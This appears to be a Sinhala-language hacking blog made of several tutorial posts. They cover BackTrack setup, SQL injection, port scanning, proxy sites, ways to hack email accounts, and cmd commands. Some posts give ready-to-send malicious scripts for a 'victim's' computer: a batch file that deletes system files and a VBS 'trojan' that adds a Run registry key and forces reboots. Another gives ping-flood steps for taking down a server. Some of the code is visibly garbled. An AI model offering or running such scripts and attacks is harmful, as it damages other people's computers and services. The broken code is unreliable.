වයිරස් 02........Delete mouse,explore,logoff

අදත් මම batch programming යොදාගෙන නිර්මාණය කරන්න පුථවන් වයිරස් code එකක් අරගෙන ආවා....මේ වයිරස් එක භාවිතා කරලා අපිට victim (ගොදුරුවන්නා) ගේ පරිඝණකයේ මවුස් එක ,කී බෝඩ් එක අක්‍රීය කරන්නත් පරිඝණකය log off තත්වයට පත් කරන්නත් පුථවන් ....... හැබැයි මේක කිසිම වැරදි අදහසකින් පාවිච්චි කරන්න එපා.......

                                                














* පහත තියෙන කෝඩ් එක නෝට්පෑඩ් එකට කොපි කරලා .bat කියන extension එක විදියට සේව් කරලා ඔයාගේ victim ගේ computer එකට යවන්න....

                                                            






code

@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

exe file එකක්  text file එකක් විදියට හදලා victim ගේ computer එකට යවන්නේ කොහොමද කියලා ඊලග පෝස්ට් එකෙන් කියලා දෙන්නම්....දිගටම රැදිලා ඉන්න......

Read more ...

backtrack 2......instalation

back trackගැන මම ලියපු පලවෙනි ලිපියට ගොඩක් හොද ප්‍රතිචාර තිබුනා ඒනිසා අදත් ඒ ගැනම ලිපියක් එකතුකරන්න හිතුවා.....මම හිතන්නේ දිගටම මෙහෙම ඔයාලාගෙ සහයෝගය ලැබේවි......අද පෝස්ට් එකෙන් මම back track install කරන විදිය ගැන විස්තර කරන්නම්....ඉස්සරහට මේකෙන් කරන්න තියෙන වැඩ ගැන කතා කරමු...

මෙහෙමයි මුලින්ම මේක ඩවුන්ලෝඩ් කරගන්න ඕන, backtrack-linux.org කියන වෙබ් අඩවියේ රෙජිස්ටර් වෙලා නොමිලේ ඩවුන්ලෝඩ් කරගන්න පුථවන්....
ඊලගට ඩවුන්ලෝඩ් කරගනිපු iso file එක සීඩී එකකට රයිට් කරගන්න....(virtual box එකටනම් ඉමේජ් ෆයිල් එකෙන් පුථවන්...)
දැන් මේක ක්රම දෙකකට install කරගන්න පුථවන්...dual boot හා virtualization විදියට...ඒ කියන්නේ වින්ඩෝස් install කරලා තියෙන computer එකකට වින්ඩෝස් තියෙද්දිම , හාර්ඩ් ඩිස්ක් එකේ අඑත් පාටිශන් එකකට install කරගෙන හෝ වින්ඩෝස් operating system එකට install කරලා තියෙන සොෆ්ට්වෙයාර් එකක් ඇතුලේ රන් වෙන විදියට මේක install කරන්න පුථවන්......

dual boot

01. මුලින්ම විනඩෝස් install කරලා තියෙන computer එකට ලොග්වෙලා ඒකේ අථත් hard partition එකක් හදාගන්න......
             hard partition එකක් හදන්නේ මෙහෙමයි...
                        * මුලින්ම my computer කියන icon එක උඩ right click කරලා manage කියන window එක open කරගන්න....

                   
                      * දැන් disk management කියන tab එක open කරගන්න...දැන් පහත රූපය විදියේ window එකක් පේන්න තියේවි...

                      * ඔය Disk කියලා පෙන්වන ඔයාලාගෙ hard partition වලින් ඉඩ තියෙන එකක් උඩ right click කරලා shrink volume කියන option එක තෝරලා ඔයාට කැමති ප්‍රමාණයක් (10gb වලට වඩා වැඩි) දීලා අථත් hard partition එකක් හදාගන්න,...
02.ඊලගට  backtrack cd එක දාලා computer එක restart කරන්න....
03.දැන් පහත විදියේ window එකක් ඒවි....ඒක ඒ විදියටම තියෙද්දී enter key එක ඔබන්න...

04.තත්පර 10කට විතර පස්සේ පහත විදියේ window එකක් ඒවි....එතන startx කියලා type කරලා enter key එක ඔබන්න...

04.දැන් backtrack live desktop open වේවි...ඒකේ install backtrack කියන icon එක click කරන්න..දැන් backtrack install වෙන්න පටන්ගනීවි...

 

05.දැන් time zone එකයි language එකයි තෝරන්න ඒවි ඊටපස්සේ hard partition එක තෝරන්න කියාවි එතනට ඔයා කලින් හදාගනිපු hard partition එක දෙන්න...

05.විනාඩි 10 කට විතර පස්සේ installer එක ඉවර වේවි....දැන් finish කියන button එක  click කරලා computer එක restart කරන්න....

06.restart කරාට පස්සේ  username එකයි login password එකයි ඉල්ලාවි...username එකට root කියලා type කරන්න password එකට toor කියලා type කරන්න දැන් ඔයාට සිස්ටම් එකට ලොග් වෙන්න පුථවන්....

 virtualization


01.මේ ක්‍රමයට install කරන්න oracle virtual box කියන software එක ඩවුන්ලෝඩ් කරගන්න ඕන ඒක මෙතනින් ඩවුන්ලෝඩ් කරගන්න...
02.සාමාන්‍ය විදියට මේ සොෆ්ට්වෙයාර් එක computer එකට  install කරගන්න...
03.දැන් මේ virtual box එක open කරලා new කියන tab එක open කරන්න....

04.දැන් os එක තෝරන්න ඒවි...එතන name කියන තැනට කැමති නමක් දීලා os type එක linux කියලාත් os version එක other linux කියලාත් තෝරන්න...

05.ඊලගට එන වින්ඩෝ එකේ ඔයාට කැමති ram space එකක් දීලා ඉස්සරහට යන්න...

06.දැන් virtual hard disk එකක් හදන්න කියාවි එතනට ඹයාට කැමති space එකක් දීලා ඉස්සරහට යන්න...
07.දැන් ඔයාගේ virtual box එකේ linux කියලා ෆයිල් එකක් හැදිලා ඇති .... ඒක select කරලා උඩ තියෙන start කියන icon එක click කරන්න...දැන් installation media එක තෝරන්න කියාවි එතනට  ඔයාගේ backtrack cd එක හරි image එක හරි තියෙන තැන පෙන්නලා next කරන්න...

 

08.දැන් මම කලින් කියලා තයෙන විදියට os එක install කරරගන්න පුථවන්......

තවත පෝස්ට් එකකින් හම්බවෙමු.......

Read more ...

BACKTRACK 1 .......හැදින්වීම

අදත් තව අථත් මාතෘකාවකින් ලිපි පෙලක් ආරම්භකරන්න බලාපොරොත්තු වෙනවා...මේකත් මම හිතන්නේ ඔයාලාට ගොඩක් වැදගත් මාතෘකාවක් වේවි ......ඒ වගේම මේක ගොඩක් අය දැනගන්න බලාපොරොත්තුවෙන් ඉන්න මාතෘකාවක් .......
back Track එහෙම නැත්නම්  kali  linux  කියලා හදුන්වන operating system එක  ගැන තමයි අද ඉදන් මේ ලිපි පේලිය  ලියන්න බලාපොරොත්තු වෙන්නේ...මුලින්ම මේ ගැන පොඩි විස්තරයක් ලියලාම පටන්ගන්නම්....

හැකින්  හා පෙන්ටෙස්ටින් සදහා  දැනට ලෝකයේ  වැඩිපුරම භාවිතාවෙන ඒ වගේම ඕනෑම හැකින් ක්‍රමයක්  සදහා  යොදාගතහැකි tools එකතුකර නිර්මාණය කරඇති මෙහෙයුම් පද්දතියක් තමයි back Track කියන්නේ....මේකත් අනිත් ලිනක්ස් මෙහෙයුම් පද්දති වගේම ඕපන් සෝස් වර්ගයේ මෙහෙයුම් පද්දතියක්...ඒවගේම මේකෙත් කමාන්ඩ් ලයින්එක භාවිතා කරලා තමයි අපට වුවමනා දේවල් කරගන්න පුථවන්, හැබැයි සාමාන්‍ය ලිනක්ස් මෙහෙයුම් පද්දතියකට වඩා ගොඩක් පහසුකම් මේකේ  තියෙනවා...ඒ වගේම backtracklinux.org කියන වෙබ් අඩවියෙන් live CD එකක් විදියට මේක නොමිලේ ඩවුන්ලෝඩ් කරගන්න පුථවන්.....ඒ කියන්නේ ඉන්ස්ටෝල් කරන්නේ නැතුව සාමාන්‍ය වැඩකරන්න  පුථවන්........ඒත් මේකෙන් හැකින්  වගේ දේවල් කරන්න නම් අනිවාර්‍යන්ම මේක ඉන්ස්ටෝල් කරන්න වෙනවා....




Backtrack මෙහෙයුම් පද්දතියේ ඇතුලත් tool කීපයක්...

Metasploit for integration
Wi-Fi drivers and packet injection
Aircrack-ng
Gerix Wifi Cracker
Kismet
Nmap
Ophcrack
Ettercap
Wireshark (Ethereal)
BeEF (Browser Exploitation Framework)
Hydra
OWASP Mantra Security Framework
Cisco OCS Mass Scanner

මේ  tools ප්‍රධාන  කොටස් 12 කට  බෙදලා පෙන්වන්න පුථවන්.......

 *   Information
 *   Vulnerability assessment
 *   Exploitation tools
 *   Privilege escalation
 *  Maintaining access
 *  Reverse engineering
 *  RFID tools
 *  Stress testing
 *  Forensics
 *  Reporting tools
 *  Services
 *  Miscellaneous

මේ ගැන ඔයාලාට ඉස්සරහට පැහැදිලි කරලා දෙන්නම්....ඒ වගේම මේ operating system  එක ඉන්ස්ටෝල් කරන විදිය ගැනත් මේකෙන් වැඩකරන විදිය ගැනත් ඉස්සරහට පැහැදිලි කරන්නම්.....එතකම් දිගටම රැදිලා ඉන්න......

Read more ...

හැකින් 13.......DATABASE and SQL injection

අද පෝස්ට් එකෙන් මම ඔයාලාට database හා SQL injection ගැන පොඩි විස්තරයක් ලියන්න බලාපොරොත්තු වෙනවා....ඉස්සරහට  මේ ගැන වැඩි විස්තර ලියන්නම්......දැනට මේ දැනුම ප්‍රමාණවත්වේවි........                          
DATABASE      

database කියන්නේ යම් පරිඝණක ජාලයක (network) එකක දත්ත ගබඩා කරලා තියෙන ස්ථානය..නෙට්වර්ක් එකේ සිටින සියථම user ලා ගේ තොරතුරු දත්ත ඇතුලත්කරලා තියෙන server එකක් තමයි ගොඩාක් වෙලාවට database කියලා හදුන්වන්නේ....යූසර් නේම් , පාස්වර්ඩ් වගේ සංවේදී තොරතුරු ,  network එක තුල හුවමාරු වෙන සංවේදී දත්ත වගේ දේවල් මේ සර්වර් එක තුල ආරක්ෂා කරලා තියෙනවා...ඒත් දක්ෂ හැකර් කෙනෙකුට මේ වගේ ඩේටාබේස් සර්වර් එකතුල තියෙන දත්ත ලබාගන්න පුථවන්...ඒ සදහා යොදාගන්න method (ක්‍රමවේදයක්) තමයි  SQL injection කියලා හදුන්වන්නේ....මේ වගේ සර්වර් විශාල ආරක්ෂාවක් ඇතුව පවත්වාගෙන යා යුතුයි....ඒත් සියථම network වලට මෙවැනි ආරක්ෂාවක් ලබාදීම ප්‍රායෝගිකව කරන්න අමාරුයි....ඒ නිසා ගොඩක් වෙලාවට මේ වගේ සර්වර් වල අකාර්‍යකෂමතා වැඩියි, ඒ හේතුව නිසා SQL injection කියන ක්‍රමවේදය පහසුවෙන් ක්‍රියාත්මක කරන්න පුථවන්...



database වර්ග
                                                                           
•    DB servers,
•    MySQL(Open source),
•    MSSQL,
•    MS-ACCESS,
•    Oracle,
•    Postgre SQL(open source),
•    SQLite,

SQL injection

SQL injection  කියන්නේ මම කලින් කියපු ඩේටාබේස් එකට හොරෙන් ඇතුල්වෙන්න හැකර්ලා යොදාගන්න ක්‍රමවේදයක්....මේ මගින් නෙට්වර්ක් එකේ ඇති අකාර්‍යකෂමතා උදව් කරගනිමින් ඩේටාබේස් එකතුල ඇති සංවේදී තොරතුරු
ලබාගන්න පුථවන්....

මේ මගින් හැකර්ට කලහැකි දේ...

* නෙට්වර්ක් එකට අනවසරයෙන් ඇතුල්වීමට පුථවන්.....
* රහස්‍ය තොරතුරු ලබාගැනීමට පුථවන්.........
* වෙබ් අඩවියේ අන්තර්ගතය වෙනස් කිරීමට පුථවන්....
* SQL server එක අක්‍රිය කිරීමට පුථවන්....

මම හිතන්නේ මේ ගැනත් ඔයාලාට සෑහෙන දැනුමක් ලැබෙන්න ඇති...ඉතින් තවත් මේ වගේ තවත් පෝස්ට් එකක් අරගෙන එන්නම් එතකම් රැදී සිටින්න..........

Read more ...

වයිරස් 01.......trojan horse using notepad

කලින් පෝස්ට් එකකින් මම ප්‍රෝගෑමින් ගැන පොඩි විස්තරයක් ලිව්වා මම හිතන්නේ ගොඩක් අය ඒක කියවන්න ඇති...ඉතින් මම අද ඉදන් අථත් මාතෘකාවක් විදියට ප්‍රෝගෑමින් යොදාගෙන වයිරස් කෝඩ් ලියනවිදිය ගැන පොඩි පෝස්ට් කීපයක් දාන්නම්...හැබැයි මේ සේරම දේවල් ලියන්නේ education purpose විතරයි,වැරදි දේවල් වලට යොදාගන්න එපා!
අද පෝස්ට් එකෙන් ලියන්නේ batch programming ඒ කියන්නේ notepad එක  යොදාගෙන trojan horse වයිරස් එකක් හදන විදිය...








මෙහෙමයි,
මුලින්ම  notepad එක open කරන්න....
ඊලගට  පහත තියෙන  code එක කොපි  කරලා  පේස්ට්  කරන්න....
.vbs කියන extension එක විදියට සේව් කරගන්න.....උදා:- trojenhorse.vbs
දැන් ඔයාගේ victim ගේ computer එකට යවන්න....

code

brakes - dlRB "DL Reboot" Trojan script by D.L.

On Error Resume Next
FSobj dim, sysDir, generateCopy, newfile, fixedCode, procreateCopy, fileData

set FSobj = CreateObject ("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder (1)

createRegKey "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \dlRB", sysDir & "\ dlRB.vbs"

sub createRegKey (regkey, regVal)
set regedit = CreateObject ("WScript.Shell")
regEdit.RegWrite regkey, regVal
end sub

set generateCopy = FSobj.CreateTextFile (sysDir + "\ dlRB.vbs")
generateCopy.close

set newfile = FSobj.OpenTextFile (WScript.ScriptFullname, 1)
setFile ()
fixedCode = replace (fileData, chr (94), "" "")

set procreateCopy = FSobj.OpenTextFile (sysDir + "\ dlRB.vbs", 2)
procreateCopy.write fixedCode
procreateCopy.close

rebootSystem ()

setFile function ()
fileData = "rem - ^ ^ by D.L. dlRB" & vbCrLf & _
"strComputer = ^. ^" & vbCrLf & _
"Set objWMIService = GetObject (winmgmts ^: ^ _" & vbCrLf & _
"& ^ {ImpersonationLevel = impersonate, (Shutdown)}! \ \ ^ & ^ & StrComputer \ root \ cimv2 ^)" &vbCrLf & _
"Set colOperatingSystems = objWMIService.ExecQuery _ '& vbCrLf & _
"(Select * from Win32_OperatingSystem ^ ^)" & vbCrLf & _
"For Each objOperatingSystem in colOperatingSystems" & vbCrLf & _
"ObjOperatingSystem.Reboot ()" & vbCrLf & _
"Next"
end function

rebootSystem function ()
strComputer = "."

Set objWMIService = GetObject ("winmgmts:" _
& "{ImpersonationLevel = impersonate, (Shutdown)}! \ \" & StrComputer & "\ root \ cimv2")

Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot ()
Next
end function

තවත් මේවගේ පෝස්ට් එකක් අරගෙන එන්නම්...එතකම් දිගටම රැදිලා ඉන්න.....

Read more ...

hacking 12......port scanning

port scanning කියන්නෙත් හැකර්ලාගේ ජනප්‍රිය ක්‍රමවේදයක්.....මේ  ක්‍රමය මගින් අපිට(හැකර්ට) හැක් කරන්න අවශ්‍ය නෙට්වර්ක් එකට ඇතුල්වෙන්න පුථවන් ඇක්ටිව්  හරි ඕපන් කරලා තියෙන හරි port තියෙනවාද කියලා පරික්ෂා කරන්න පුථවන්....හරියට හොරෙක්  ගෙදරක ඇරලා තියෙන ජනෙල් හොයනවා වගේ.......

සාමාන්‍ය port scan එකක් සිදුවෙන්නේ මෙහෙමයි...



Starting Scan.

Target Host: www.yourcompany.com or IP Address

TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrpc)
Finished.

මේ මගින් අපි Scan කරන නෙට්වර්ක් එකේ සියථම ඇක්ටිව් Port  පෙන්නනවා.......



ක්‍රම 2කට අපිට  port scanning කරන්න පුථවන්....

* එක අයිපී ඇඩ්රස් එකක්  ස්කෑන් කරලා ඒකට අධාල Port සොයාගැනීම - මේක හරියට හොරෙක් එක ගෙදරක ඇරලා තියෙන ජනේලයක් හොයනවා වගේ.......තමන්ට අවශ්‍ය අයිපී එක විතරක් ස්කෑන් කරලා ඇක්ටිව් Port සොයාගන්න එක මේ විදියට හදුන්වන්න  පුථවන්......
* අයිපී  රේන්ජ්  එකක් ස්කෑන් කිරීම - මේක හරියට හොරෙක් වීදියක ඇරලාතියෙන ජනේලයක් හොයනවා වගේ.....අයිපී  ඇඩ්රස්  කීපයක  ඇක්ටිව් Port සොයාගන්න එක මේ විදියට හදුන්වන්න  පුථවන්......

මේ Port යොදාගෙන අපිට  හැක් කරන්න වුවමනා නෙට්වර්ක් එකට හොරෙන් ඇතුල්වෙලා ඒකෙ තියෙන සංවේදී තොරතුරු ලබාගන්න පුථවන්....

තවත් පෝස්ට් 1කින් හම්බවෙමු !!!!!!!!!!!!!

Read more ...

හැකින් 11.....c ප්‍රෝගෑමින්ග්

හැකර් කෙනෙක් වෙන්න බලාපොරොත්තුවෙනවානම් අඩුමතරමේ එක ප්‍රෝගැරැමින්ග් ලැන්ග්වේජ් එකක්වත් දැනගෙන ඉන්න ඕන.....ගොඩක් ලොකුවට වුවමනා නැහැ ඒත් c , c++ වගේ ලැන්ග්වේජ් එකක් ගැන සාමාන්‍ය තරමින්වත් දැනගෙන ඉන්න එක වටිනවා...ඉතින් මම අද පෝස්ට් එකෙන් c ප්‍රෝගෑම් කරන විදිය,කම්පයිල් කරන විදිය ගැන පොඩ්ඩක් ලියන්නම්...ඉස්සරහට මම ගැන වෙනම පෝස්ට් ටිකක් දාන්නම් එතකම් සාමාන්‍ය දැනුමක් ලබාගන්න මේ පෝස්ට් එක උදව් වේවි.......


 * මුලින්ම "Turbo c " කියන කම්ෆයිලර් සොෆ්ට්වෙයාර් එක ඩවුන්ලෝඩ් කරගන්න.....

* දැන් සාමාන්‍ය විදියට ඉන්ස්ටෝල් කරගන්න....

* දැන් "c:\tc\bin" කියන path 1 තියෙන tc.exe කියන ෆයිල් එක ඕපන් කරගන්න....

 * turbo c editor එකේ File Menu තියෙන New කියන එක තෝරන්න

 

* දැන් කෝඩ් එක ටයිප් කරන්න (මේ ගැන ඉස්සරහට කියලා දෙන්නම් එතකම් ඔයාලාට වුවමනා ප්‍රෝගෑම් එකේ කෝඩ් google එකෙන් හොයාගන්න)

 
 * අන්තිමට .c කියලා නම ලියලා සේව් කරන්න (.c extension) උදා :- hello.c

 * කම්පයිල් කරන්න alt+f9 ප්‍රෙස් කරන්න

* exe file එකක් හදන්න f9 ප්‍රෙස් කරන්න

* run කරන්න ctrl + f9 ප්‍රෙස් කරන්න

ඉස්රහට c ප්‍රෝගෑමින්ග් වලින් කරන්න වැඩක් ටිකක් කියලා දෙන්නම්.....දිගටම රැදිලා ඉන්න......

Read more ...

හැකින් 10......පොඩි ගේමක් දෙමු

කට්ටියට කම්මැලි ඇතිනේ තියරිම කියවලා....ඉතින් අද පොඩි වැඩකෑලි ටිකක් කියලා දෙන්නම්...හැබැයි නරක වැඩ වලට පාවිච්චි කරන්න එපා....
මෙහෙමයි මුලින් ඔයාලාට මේ ඇටෑක් එක ගැන පොඩි විස්තරයක් ලියලාම පටන් ගන්නම්.....මේවිදියෙ ඇටෑක් වලට කියන්නේ dos (denial of service) ඒ කියන්නේ මොකක් හරි සර්වර් එකකින් ලබා දෙන සේවාවක් අඩාල කිරීම තමයි මේ විදියට හදුන්වන්නේ....ගොඩක් වෙලාවට ping කමාන්ඩ් එක යොදාගෙන මේ විදියෙ ඇටෑක් කරන්න පුථවන්..source (එවන කෙනාගෙ) ip address එක වෙනස් කරලා ping කිරීමෙන්,ping කිරීමට යොදා ගන්නා දත්ත ප්‍රමාණය වැඩි කිරීමෙන්,නොනවත්වා ping කිරීම වගේ දේවල් වලින්  තමන්ට ඇටෑක් කරන්නන වුවමනා සර්වර් එකේ overhead එකක් ඇති කරලා ඒ සර්වර් එක crash කරන්න හරි ඒ සර්වර් එකෙන් අධාල නෙට්වර්ක් එකට ලබාදෙන සේවාව අඩාල කරන්න හරි මේ ඇටෑක් එක පාවිච්චි කරන්න පුථවන්....



අද මම කියලා දෙන්නම් ඔය කියපු ping කරන පැකට් එකේ දත්ත ප්‍රමාණය වැඩි කරලා නොනවත්වා  ping කිරීමෙන් dos ඇටෑක් එකක් දෙන විදිය...මේ ක්‍රමේට කියන්නේ ping of death කියලා..නමෙන් තේරෙනවා ඇතිනේ වැඩේ මොකක්ද කියලා...හැබැයි තව දෙයක් තියෙනවා මේක වින්ඩෝස් වලින් දරුණුවට කරන්න බැහැ,ලිනක්ස් වගේ ඔපරේටින් සිස්ටම් එකකින් කරනවා නම් දරුණුවටම කරන්න පුථවන්...(වින්ඩෝස් වලින් උපරිම පැකට් සයිස් එක වැඩි කරන්න පුථවන් 65500 bytes වෙනකම් විතරයි......ඒත් ලිනක්ස් වලින් ඊටවඩා ලොකු පැකට් එකක් යවන්න පුථවන්) දැනට දෙයක් ඉගෙනගන්න වින්ඩෝස් වලින් කරලා බලන්න ....


වැඩේ කරන්නෙ මෙහෙමයි...

* මුලින්ම කමාන්ඩ් ප්‍රොම්ප්ට් එක ඕපන් කරගන්න (windows බට්න් එකත් R අකුර ප්‍රෙස් කරලා run එක ඕපන් කරලා ඒකේ cmd කියලා ටයිප් කරලා  එන්ටර් කරන්න)
* ඊටපස්සේ ping (ඔයාට හැක් කරන්න වුවමනා සර්වර් එකේ  අයි පී එක) ටයිප්  කරලා බලන්න
           උදා :- ping 192.168.10.1
* ping එක වැඩ කරනවානම් ping -l (ඔයාට යවන්න  වුවමනා දත්ත ප්‍රමාණය) (අයි පී එක) -t කියලා ටයිප් කරන්න....
           උදා :- ping -l 5000 192.168.10.1 -t
* දැන් නොනවත්වා රිප්ලයි ඒවි...ටික  වෙලාවකින් සර්වර් එක ඩවුන්...



ඔය -l කියන්නේ පැකට් එකේ ප්‍රමාණය වැඩි කරන කමාන්ඩ් එක එතන 5000 වෙනුවට ඔයාට  කැමති ප්‍රමාණයක් දෙන්න....
වින්ඩෝස් වල උපරිම 65500...-t කියලා තියෙන්නේ නොනවත්වා පින් කරන්න ලබාදෙන කමාන්ඩ් එක.....

මම හිතන්නේ කට්ටිය වැඩේට කැමති ඇති...ඉස්සරහට හොද වැඩ ටිකක් කියලා දෙන්නම්...දිගටම රැදිලා ඉන්න!!!!!!!!!!!!!!!!!

Read more ...

හැකින් 9.........proxy sites

proxy server ගැන මම කලින් පොඩි විස්තරයක් ලිව්වා මම හිතන්නේ ඒක ඔයාලා කියවන්න ඇති.....මෙහෙමයි proxy server එකක් කියන්නේ ආයතනයක නෙට්වර්ක් එකක් පිටත (අන්තර්ජාලය) සමග ඇති සබදතා සීමා කරන්නත්,එමගින් තමන්ගේ නෙට්වර්ක් එකේ ආරක්ෂාව තහවුරු කරගන්නත් හදලා තියෙන  ආරක්ෂක ක්‍රමයක්...අද මම කියන්න යන්නේ මේ proxy server එකකින් තහනම් කරපු වෙබ් සයිට් වලට යන්නේ කොහොමද කියලා.....

මේ ක්‍රමය ගොඩක් අය  දන්නවත් ඇති ඒත් දන්නෙනැති අයත් ඉන්න නිසා මම මේ ගැන පොඩි විස්තරයක් ලියන්නම්.....
ගොඩක් ආයතන වල බ්ලොක් කරන්නේ පේස්බුක්,යූටියුබ් වගේ වෙබ් අඩවි නේ...ඉතින් අන්තර්ජාලයෙම තියෙන proxy sites කියන වෙබ් අඩවි භාවිතා කරලා අපේ අයි පී එක වෙනස් කරලා මම කලින් කියපු proxy server එකටත් හොරා අපට අවශ්‍ය වෙබ් අඩවියකට යන්න පුථවන්...ඒ වගේම හැකින් කරන අය අනිවාර්‍යන්ම තමන්ගේ අයි පී එක වෙනස් කරගෙන තමන්ගෙ වැඩ කරන එක ගොඩක් හොදයි ...මොකද නැත්නම් නිකම්ම ඔයාලාව හොයාගන්න පුථවන්....ඒ වගේම fiverr වගේ ඊමනි සයිට් වල රෙජිස්ටර් වෙන්න  බලාපොරොත්තු වෙනවා නම්  වෙන රටක විදියට තමන්ගෙ අකවුන්ට් එක හදාගන්න එක හොදයි කියලත් ඔයාලා අහලා ඇතිනේ ඉතින් ඒකටත් මේ proxy sites පාවිච්චි කරන්න පුථවන්...



මම දන්න proxy සයිට් කීපයක් පහතින් දාන්නම්... හැබැයි මේ ඔක්කොම කරන්නේ ඔයාලාට දෙයක් දැනගන්න  විතරයි....අත්‍යාවශ්‍ය වෙලාවකට විතරක් පාවිච්චි කරන්න හැබැයි හොරවැඩ වලට නෙමෙයි...

new ip now
Pricacywanted.info
Netrover.info
Hidemyass.com
Launchwebs.org
Clear5.info                          
Bingbot.info
Calculatepie.com
Unicornpipe.com
truckflood.com
fly proxy
Fire-proxy

ඔය තියෙන සයිට් වලින් එකකට ගිහිල්ලා ඔයාලාට යන්න අවශ්‍ය සයිට් එකේ url එක දීලා සබ්මිට් කරන්න...තව පෝස්ට් එකක් අරගෙන එන්නම් එතකම් දිගටම රැදිලා ඉන්න.............

Read more ...

හැකින් 8........ඊමේල් අකවුන්ට් හැක් කිරීමේ ක්‍රම

මුලින්ම හැක් කරන්න පටන් ගන්න හොද වැඩක් තමයි ඊමේල් අකවුන්ට් හැක් කිරීම...අද මම ඊමේල් අකවුන්ට් එකක් හැක් කරන්න පුථවන්  ක්‍රම කීපයක් ගැන විස්තර කරන්නම්...ඉස්සරහට ඕවා කරන විදියත් කියලා දෙන්නම් එතකම් මුලික දැනුමක් ගන්න මේ පෝස්ට් එක වැදගත් වේවි......
                                                        ක්‍රම කීපයකට අපිට ඊමේල් අකවුන්ට් හැක් කරන්න පුථවන්....

01.social engineering
                    * fishing
02.brute force attack මගින්
03.keylogger හාවිතා කර
04.security question එක guess කිරීම

01 . social engineering

මේ ක්‍රමය ගැන මම කලින් පෝස්ට් එකක් ලිව්වා...ඒක කියවන්න මෙතනින් යන්න..හැකර් විසින් හැක් කරන්න අවශ්‍ය කෙනාට ඊමේල් එකක් යවනවා...ඒ ඊමේල් එකේ තියෙන්නේ අත්‍යාවශ්‍ය හේතුවකට තමන්ගේ ඊමේල් යුසර්නේම් එකයි පාස්වර්ඩ් එකයි එතන ඇතුල් කරන්න කියලා...ගොඩක් වෙලාවට මේ ඊමේල් එක එවන්නෙ වැදගත් ආයතනයක නමකින් ඒ නිසා ගොඩක් අය මේ වගේ දේවල් වලට රැවටෙනවා...........

                                      * fishing web page

මේකත් social engineering වලට අයත්වෙන ක්‍රමයක්....ඊමේල් එකවුන්ට් එකේ ලොගින් පේජ් එක විදියට හැදූ ව්‍යාජ වෙබ් පිටුවක් තමන්ට හැක් කිරීමට අවශ්‍ය පුද්ගලයාවෙත යොමුකර එමගින් ඔහුගේ ඊමේල් පාස්වර්ඩ් ,යූසර්නේම් ලබා ගැනීම මේ විදියට හදුන්වන්න පුථවන්...

02 . brute force attack

මේකත් ජනප්‍රිය ක්‍රමයක්...සොෆ්ට්වෙයාර් එකක් හෝ ප්‍රෝගෑම් එකක් භාවිතයෙන් පාස්වර්ඩ් එක සොයාගැනීමට උත්සාහ කිරීම මේ විදියට හදුන්වන්න පුථවන්...











03 . keylogger

මේ ක්‍රමයෙන් කරන්නේ keylogger කියන විශේෂ ප්‍රෝගෑම් එකක් හැක් කරන්න අවශ්‍ය කෙනාගෙ පරිඝණකයට හොරෙන් ඇතුල් කරනවා...ඒ ප්‍රෝගෑම් එකෙන් එම  පරිඝණකයේ කෙරෙන සියථම වැඩවල තොරතුරු screenshot විදියට හැකර්ගෙ ඊමේල් එකවුන්ට් එකට එවනවා...ඒ වගේම ටයිප් කරන පාස්වර්ඩ් වල තොරතුරුත් ඊමේල් එකට ලබාගන්න පුථවන්......

04 . security question එක guess කිරීම

මේකනම් ගොඩක් අය දන්නවා ඇති...ගොඩක් ඊමේල් සේවා සපයන ආයතන තම ගිණුම් හිමියන්ගේ ආරක්ෂාවට මේ security question කියන ක්‍රමය භාවිතා කරනවා...ඒත් මේ security question එකට යූසර් ලබාදීපු උත්තරය අනුමාන කරලා
හැකර්ට තමන්ට අවශ්‍ය ඊමේල් අකවුන්ට් එකට ලොග් වෙන්න පුථවන්....

මම  හිතනන්නේ මේ පෝස්ට් එකෙනුත් ඔයාලාට වැදගත් දෙයක් දැනගන්න ලැබෙන්න ඇති....ඉක්මනටම  තවත් පෝස්ට් එකක් අරගෙන එන්නම් එතකම් රැදිලා ඉන්න !!!!!!!!!!!!

Read more ...

හැකින් 7.........වැදගත් කමාන්ඩ් කීපයක්

අද පෝස්ට් එකෙන් මම ඔයාලාට වැදගත්වෙන command prompt කමාන්ඩ් කීපයක් විස්තර ඇතුව ලියන්න බලාපොරොත්තු වෙනවා...මම හිතන්නෙ ඔයාලා හැමෝම command prompt ගැන හොදට දන්නවා ඇති, ඒ නිසා මම ඒ ගැන වැඩිය විස්තර ලියන්න යන්නෙ නැහැ........කෙලින්ම කමාන්ඩ් ටික ගැන ලියන්නම්........

#  ipconfig :- මේ කමාන්ඩ් එකෙන් පරිඝණකයේ ip address,subnet mask ,default gateway,DNSවගේ සෙටින්ස් ගැන විස්තර දැනගන්න පුථවන්....මේක trouble shooting වලදි නිතරම පාවිච්චි වෙන කමාන්ඩ් එකක්....


ipconfig :- සාමාන්‍ය අයිපී සෙටින්ස් ගැන විස්තර දැනගන්න මේ කමාන්ඩ් එක යොදාගන්න පුථවන්...
ipconfig /all :- පරිඝණකයේ මැක් ඇඩ්රස් එක හා සියථම TCP IP සෙටින්ස් ගැන විස්තර දැනගන්න මේ කමාන්ඩ් එක යොදාගන්න පුථවන්...

ipconfig /displaydns :- local DNS සෙටින්ස් ගැන තොරතුරු දැනගන්න මේ කමාන්ඩ් එක යොදාගන්න පුථවන්...
ipconfig /flushdns :- local DNS සෙටින්ස් මකලා දාන්න මේ කමාන්ඩ් එක යොදාගන්න පුථවන්...

# systeminfo :- තම පරිඝණකයේ හෝ වෙනත් පරිඝණකයකට ඇතුල්වී(remote machine) එහි service pack level ඇතුථ operating system සැකසුම් තොරතුරු දැනගන්න මේ කමාන්ඩ් එක යොදාගන්න පුථවන්....

 
